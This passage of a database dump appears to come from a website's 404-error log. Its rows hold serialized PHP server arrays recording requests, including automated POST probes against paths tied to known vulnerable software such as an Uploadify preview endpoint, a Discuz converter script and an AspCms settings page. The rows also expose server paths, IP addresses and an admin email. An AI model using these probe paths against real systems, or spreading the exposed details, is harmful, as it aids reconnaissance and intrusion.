:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.148.87.125\";s:11:\"REMOTE_PORT\";s:5:\"65225\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbH8n4ethpukHqSvdSa7mwAAAI8\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571945631.3536\";s:12:\"REQUEST_TIME\";s:10:\"1571945631\";}}','notice','2019-10-24 19:33:52','2019-10-24 19:33:51',34870800,36679872,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'104.148.87.125'),(29019,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbH8mIethpukHqSvdSa7kwAAAIw\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbH8mIethpukHqSvdSa7kwAAAIw\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.148.87.125\";s:11:\"REMOTE_PORT\";s:5:\"53268\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbH8mIethpukHqSvdSa7kwAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571945624.4573\";s:12:\"REQUEST_TIME\";s:10:\"1571945624\";}}','notice','2019-10-24 19:33:46','2019-10-24 19:33:44',34891616,36697112,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'104.148.87.125'),(29018,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbH8k7tT8JwOs5jHKC2UQwAAAMY\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"104.148.87.125\";s:11:\"REMOTE_PORT\";s:5:\"60283\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbH8k7tT8JwOs5jHKC2UQwAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571945619.1032\";s:12:\"REQUEST_TIME\";s:10:\"1571945619\";}}','notice','2019-10-24 19:33:40','2019-10-24 19:33:39',34872224,36676128,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'104.148.87.125'),(29017,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/?page_id=18&count=41\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.25 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:19:\"page_id=18&count=41\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"124.120.234.6\";s:11:\"REMOTE_PORT\";s:5:\"51853\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbH7cIethpukHqSvdSa7DAAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571945329.7246\";s:12:\"REQUEST_TIME\";s:10:\"1571945329\";}}','notice','2019-10-24 19:28:52','2019-10-24 19:28:50',35024776,36839896,'https://bintara.com.my/?page_id=18&count=41',1,0,'124.120.234.6'),(29016,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-t1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHeS1jNtOv7R6PiFSOCSQAAAQA\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-t1/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.35\";s:11:\"REMOTE_PORT\";s:4:\"1938\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-t1/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-t1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbHeS1jNtOv7R6PiFSOCSQAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571937867.3863\";s:12:\"REQUEST_TIME\";s:10:\"1571937867\";}}','notice','2019-10-24 17:24:29','2019-10-24 17:24:27',33820104,35620128,'https://bintara.com.my/toughbook-t1/',1,0,'207.46.13.35'),(29015,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.82.235.10\";s:11:\"REMOTE_PORT\";s:5:\"49626\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHd-fFpOCFrnbveBo7ypQAAARA\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571937789.9094\";s:12:\"REQUEST_TIME\";s:10:\"1571937789\";}}','notice','2019-10-24 17:23:11','2019-10-24 17:23:10',35257712,37062168,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'103.82.235.10'),(29014,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbHd8@z3CZCKxSbHE7euTAAAAEM\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHd8@z3CZCKxSbHE7euTAAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.82.235.10\";s:11:\"REMOTE_PORT\";s:5:\"55687\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHd8@z3CZCKxSbHE7euTAAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571937779.208\";s:12:\"REQUEST_TIME\";s:10:\"1571937779\";}}','notice','2019-10-24 17:23:01','2019-10-24 17:22:59',35282480,37086904,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'103.82.235.10'),(29013,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHd7I26A5Rjvd8Yk9LCXQAAABc\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.82.235.10\";s:11:\"REMOTE_PORT\";s:5:\"63485\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHd7I26A5Rjvd8Yk9LCXQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571937772.9046\";s:12:\"REQUEST_TIME\";s:10:\"1571937772\";}}','notice','2019-10-24 17:22:55','2019-10-24 17:22:53',35656416,37463064,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'103.82.235.10'),(29012,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHVN92Cd74l7secq5l60QAAAUs\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.96.18\";s:11:\"REMOTE_PORT\";s:5:\"60177\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHVN92Cd74l7secq5l60QAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571935543.3453\";s:12:\"REQUEST_TIME\";s:10:\"1571935543\";}}','notice','2019-10-24 16:45:45','2019-10-24 16:45:44',35262888,37074128,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.96.18'),(29011,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 